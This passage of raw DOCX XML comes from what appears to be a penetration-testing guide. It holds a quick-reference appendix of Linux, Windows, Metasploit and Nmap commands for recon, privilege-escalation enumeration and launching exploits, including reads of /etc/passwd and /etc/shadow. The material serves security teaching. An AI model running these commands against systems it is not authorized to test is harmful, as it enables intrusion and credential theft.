            <w:shd w:fill="E65100" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">REMINDER</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7920"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="E65100" w:sz="4"/>
              <w:left w:val="single" w:color="E65100" w:sz="4"/>
              <w:bottom w:val="single" w:color="E65100" w:sz="4"/>
              <w:right w:val="single" w:color="E65100" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="FFF3E0" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">A security tool is only as ethical as its operator. Building in guardrails helps, but ultimately you are responsible for ensuring every test is authorized, scoped, and documented.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="480" w:after="160"/>
        <w:outlineLvl w:val="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A3A5C"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve">Appendix A: Quick Reference - Essential Commands</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="240" w:after="160"/>
        <w:outlineLvl w:val="1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A3A5C"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">Linux Command Quick Reference</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="00FF7F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"># System Info</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="00FF7F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">uname -a              # Kernel version</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="00FF7F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">id                    # Current user/groups</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="00FF7F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">whoami                # Current username</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="00FF7F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">hostname              # Machine hostname</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="00FF7F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="00FF7F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"># Network</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="00FF7F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">ip addr               # IP addresses</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="00FF7F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">ip route              # Routing table</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="00FF7F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">netstat -tulnp        # Listening ports</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="00FF7F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">ss -tulnp             # Modern netstat</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="00FF7F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="00FF7F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"># Files</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="00FF7F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">find / -perm -4000 -type f 2&gt;/dev/null  # Find SUID</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="00FF7F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">find / -writable -type f 2&gt;/dev/null    # Find writable</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="00FF7F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">cat /etc/crontab      # Cron jobs</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="00FF7F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">cat /etc/passwd       # User accounts</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="00FF7F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">cat /etc/shadow       # Password hashes (root only)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="240" w:after="160"/>
        <w:outlineLvl w:val="1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A3A5C"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">Windows Command Quick Reference</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="00FF7F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"># Recon</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="00FF7F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">systeminfo            # System info</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="00FF7F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">whoami /all           # User + privileges</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="00FF7F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">net user              # Local users</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="00FF7F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">net localgroup administrators  # Admins</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="00FF7F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">ipconfig /all         # Network config</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="00FF7F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="00FF7F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"># Privilege Escalation Checks</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="00FF7F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">schtasks /query /fo LIST /v   # Scheduled tasks</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="00FF7F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">wmic service get name,pathname,startmode  # Services</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="00FF7F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">reg query HKLM\System\CurrentControlSet\Services  # Services in registry</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="00FF7F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="00FF7F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"># Recovery mode access (restart to recovery)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="00FF7F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">shutdown /r /o /f /t 0</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="240" w:after="160"/>
        <w:outlineLvl w:val="1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A3A5C"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">Metasploit Quick Reference</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="00FF7F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">search [term]         # Search for modules</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="00FF7F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">use [module path]     # Select a module</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="00FF7F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">show options          # Show required options</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="00FF7F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">set [OPTION] [value]  # Set option</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="00FF7F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">check                 # Check if target is vulnerable</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="00FF7F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">run / exploit         # Launch the exploit</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="00FF7F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">sessions -l           # List active sessions</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="00FF7F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">sessions -i [ID]      # Interact with session</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="00FF7F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">background            # Background current session</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="00FF7F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="240" w:after="160"/>
        <w:outlineLvl w:val="1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A3A5C"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">Nmap Quick Reference</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="00FF7F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">nmap -sn subnet/24               # Ping sweep</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="00FF7F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">nmap -sV -A target               # Full scan with version/OS</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="00FF7F"/>
